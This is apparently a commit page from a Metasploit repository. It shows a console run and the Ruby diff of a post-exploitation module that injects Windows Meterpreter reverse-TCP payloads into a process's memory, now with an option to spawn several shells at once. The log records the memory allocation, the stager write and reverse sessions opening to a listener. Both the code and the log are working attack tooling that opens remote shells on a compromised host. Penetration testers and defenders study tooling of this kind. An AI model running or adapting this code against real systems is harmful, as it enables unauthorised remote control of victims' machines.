Added multiple payload capabilities

Added support to specify multiple payload delivery options.

msf post(payload_inject) > show options

Module options (post/windows/manage/payload_inject):

   Name     Current Setting                  Required  Description
   ----     ---------------                  --------  -----------
   AMOUNT   2                                no        Select the amount of shells you want to spawn.
   HANDLER  false                            no        Start an Exploit Multi Handler to receive the connection
   LHOST    XXXXXXXX                         yes       IP of host that will receive the connection from the payload.
   LPORT    4433                             no        Port for Payload to connect to.
   OPTIONS  #<Msf::OptInt:0x007f5c6439c6d8>  no        Comma separated list of additional options for payload if needed in 'opt=val,opt=val' format.
   PAYLOAD  windows/meterpreter/reverse_tcp  no        Windows Payload to inject into memory of a process.
   PID                                       no        Process Identifier to inject of process to inject payload.
   SESSION  1                                yes       The session to run this module on.

msf post(payload_inject) > set HANDLER true
HANDLER => true
msf post(payload_inject) > exploit

[*] Running module against XXXXXXXX
[*] Starting exploit multi handler
[*] Performing Architecture Check
[*] Started reverse handler on XXXXXXXX:4433 
[*] Starting the payload handler...
[*] Process found checking Architecture
[+] Process is the same architecture as the payload
[*] Injecting Windows Meterpreter (Reflective Injection), Reverse TCP Stager into process ID 884
[*] Opening process 884
[*] Generating payload
[*] Allocating memory in procees 884
[*] Allocated memory at address 0x003b0000, for 290 byte stager
[*] Writing the stager into memory...
[*] Sending stage (770048 bytes) to XXXXXXXX
[+] Successfully injected payload in to process: 884
[*] Performing Architecture Check
[*] Process found checking Architecture
[+] Process is the same architecture as the payload
[*] Injecting Windows Meterpreter (Reflective Injection), Reverse TCP Stager into process ID 884
[*] Opening process 884
[*] Generating payload
[*] Allocating memory in procees 884
[*] Allocated memory at address 0x00ba0000, for 290 byte stager
[*] Writing the stager into memory...
[+] Successfully injected payload in to process: 884
[*] Post module execution completed
msf post(payload_inject) > [*] Meterpreter session 2 opened (XXXXXXXX:4433 -> XXXXXXXX:2962) at 2013-10-09 21:54:25 -0400

[*] Sending stage (770048 bytes) to XXXXXXXX

msf post(payload_inject) > [*] Meterpreter session 3 opened (XXXXXXXX:4433 -> XXXXXXXX:2963) at 2013-10-09 21:54:27 -0400
bug/bundler_fix
trustedsec 2013-10-09 22:01:11 -04:00
parent c91816c4b2
commit d208ab9260
1 changed files with 22 additions and 17 deletions

View File

@ -7,9 +7,12 @@
require 'msf/core'
require 'rex'
require 'msf/core/post/common'
class Metasploit3 < Msf::Post
include Msf::Post::Common
def initialize(info={})
super( update_info( info,
'Name' => 'Windows Manage Memory Payload Injection Module',
@ -19,32 +22,28 @@ class Metasploit3 < Msf::Post
using a reverse x86 TCP Meterpreter Payload.
},
'License' => MSF_LICENSE,
'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>'],
'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>',
'David Kennedy "ReL1K" <kennedyd013[at]gmail.com>' # added multiple payload support
],
'Platform' => [ 'win' ],
'SessionTypes' => [ 'meterpreter' ]
))
register_options(
[
OptString.new('PAYLOAD',
[false, 'Windows Payload to inject into memory of a process.',
"windows/meterpreter/reverse_tcp"]),
OptAddress.new('LHOST',
[true, 'IP of host that will receive the connection from the payload.']),
OptInt.new('LPORT',
[false, 'Port for Payload to connect to.', 4433]),
OptInt.new('PID',
[false, 'Process Identifier to inject of process to inject payload.']),
OptBool.new('HANDLER',
[ false, 'Start an Exploit Multi Handler to receive the connection', false]),
OptString.new('OPTIONS',
[false, "Comma separated list of additional options for payload if needed in \'opt=val,opt=val\' format.",
""])
OptString.new('PAYLOAD', [false, 'Windows Payload to inject into memory of a process.', "windows/meterpreter/reverse_tcp"]),
OptAddress.new('LHOST', [true, 'IP of host that will receive the connection from the payload.']),
OptInt.new('LPORT', [false, 'Port for Payload to connect to.', 4433]),
OptInt.new('PID', [false, 'Process Identifier to inject of process to inject payload.']),
OptBool.new('HANDLER', [ false, 'Start an Exploit Multi Handler to receive the connection', false]),
OptString.new('OPTIONS', [false, "Comma separated list of additional options for payload if needed in \'opt=val,opt=val\' format."]),
OptInt.new('AMOUNT', [false, 'Select the amount of shells you want to spawn.', 1])
], self.class)
end
# Run Method for when run command is issued
def run
# syinfo is only on meterpreter sessions
print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil?
@ -62,6 +61,7 @@ class Metasploit3 < Msf::Post
opts = datastore['OPTIONS']
# Create payload
payload = create_payload(pay_name,lhost,lport,opts)
if pid == 0 or not has_pid?(pid)
pid = create_temp_proc(payload)
end
@ -71,7 +71,12 @@ class Metasploit3 < Msf::Post
return false
else
create_multihand(payload,pay_name,lhost,lport) if datastore['HANDLER']
datastore['AMOUNT'].times do # iterate through number of shells
inject_into_pid(payload,pid,datastore['NEWPROCESS'])
end
end
end